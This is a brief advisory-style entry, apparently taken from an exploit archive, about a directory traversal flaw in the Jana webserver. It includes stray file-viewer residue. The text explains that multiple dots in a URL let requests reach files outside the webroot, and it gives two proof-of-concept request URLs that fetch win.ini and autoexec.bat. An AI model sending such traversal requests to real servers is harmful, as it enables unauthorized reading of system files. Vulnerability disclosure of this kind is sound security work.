9 lines
No EOL
347 B
Text
9 lines
No EOL
347 B
Text
source: https://www.securityfocus.com/bid/699/info
|
|
|
|
|
|
The Jana webserver is susceptible to directory traversal attacks using multiple dots in the URL. If the request is made in specific formats, the server will send out files outside of the intended webroot.
|
|
|
|
|
|
http ://target/./.././.././.././win.ini
|
|
or
|
|
http ://target/....../autoexec.bat |